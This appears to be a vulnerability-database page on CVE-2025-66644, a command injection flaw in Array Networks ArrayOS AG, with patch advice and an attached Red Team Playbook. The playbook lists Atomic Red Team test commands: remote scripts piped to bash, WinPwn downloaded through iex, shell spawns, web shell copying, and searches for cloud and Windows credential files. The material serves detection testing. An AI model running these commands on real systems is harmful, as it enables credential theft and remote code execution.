CVE-2025-66644
Overview
This vulnerability is a command injection flaw rooted in improper input validation within Array Networks ArrayOS AG versions prior to 9.4.5.9. The issue arises from insufficient sanitization of user-supplied data passed to system-level commands in the VPN appliance's management interface. The affected component is the ArrayOS AG software responsible for handling administrative command inputs, enabling attackers with elevated privileges to inject arbitrary commands.
Vulnerability Description
Array Networks ArrayOS AG before 9.4.5.9 allows command injection, as exploited in the wild in August through December 2025.
Impact
An attacker with a valid high-privilege account can execute arbitrary system commands on the ArrayOS AG device, leading to full control over the appliance. This includes the ability to deploy persistent webshells, manipulate VPN configurations, and potentially pivot into the internal network. No user interaction is required beyond authentication, enabling lateral movement and persistent compromise of network infrastructure. The breach of this critical VPN component risks exposing sensitive data and disrupting secure communications.
Solution
Array Networks has released a security update addressing this command injection vulnerability in ArrayOS AG version 9.4.5.9. Users should upgrade to version 9.4.5.9 or later immediately. Detailed patch instructions and advisory information are available from JPCERT at https://www.jpcert.or.jp/at/2025/at250024.html. Additionally, monitoring official Array Support communications, such as their Twitter status updates, is recommended to track further mitigation guidance.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Array Networks' ArrayOS AG prior to version 9.4.5.9 is characterized by a critical command injection flaw that allows attackers to execute arbitrary commands on the affected system. This type of vulnerability arises when an application improperly sanitizes user input, allowing malicious actors to manipulate command execution processes. In this case, the flaw resides within the handling of input parameters, enabling attackers to inject commands that the system will execute with the privileges of the application. Given the nature of command injection vulnerabilities, the potential for exploitation is significant, particularly in environments where the affected software is deployed in critical network infrastructure.
Attack vectors for this vulnerability are varied and can be exploited through multiple means, including web interfaces, API endpoints, or any other input mechanisms that the software exposes. Attackers can craft specially designed requests that include malicious payloads, which, when processed by the vulnerable system, result in the execution of arbitrary commands. The exploitation of this vulnerability has been observed in the wild, indicating that threat actors are actively targeting systems running the affected software. Scenarios may include remote code execution, where an attacker gains control over the system, leading to further network breaches, data exfiltration, or the deployment of malware.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on the affected software for critical operations. With a CVSS score of 9.8, the severity of the risk is underscored, as successful exploitation can lead to complete system compromise. Businesses may face significant operational disruptions, financial losses, and reputational damage as a result of a breach. The potential for data loss or unauthorized access to sensitive information can also lead to regulatory repercussions, especially in industries governed by strict compliance standards. Organizations must recognize that the implications of such vulnerabilities extend beyond immediate technical concerns, affecting overall business continuity and stakeholder trust.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular vulnerability assessments and penetration testing can help identify systems running the affected software, allowing for timely remediation. Additionally, organizations should ensure that they are running the latest version of the software, as updates often include critical security patches. Intrusion detection systems (IDS) can be configured to monitor for unusual command execution patterns, alerting security teams to potential exploitation attempts. Furthermore, employing application firewalls can help filter out malicious input before it reaches the vulnerable application, providing an additional layer of defense.
In conclusion, the command injection vulnerability in Array Networks' ArrayOS AG presents a significant threat to organizations utilizing this software. The ease of exploitation, combined with the potential for severe consequences, necessitates immediate attention from cybersecurity professionals. By adopting proactive detection and mitigation strategies, organizations can reduce their risk exposure and enhance their overall security posture. As the threat landscape continues to evolve, staying informed about vulnerabilities and implementing robust security measures will be crucial in safeguarding critical infrastructure against malicious actors.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Arraynetworks | Arrayos Ag | All |
cpe:2.3:o:arraynetworks:arrayos_ag:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
43%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-66644 |
| jpcert.or.jp |
GitHub CVE
|
https://www.jpcert.or.jp/at/2025/at250024.html |
| x.com |
GitHub CVE
|
https://x.com/ArraySupport/status/1921373397533032590 |
| bleepingcomputer.com |
GitHub CVE
|
https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-arrayos-ag-vpn-flaw-to-plant-webshells/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-66644 |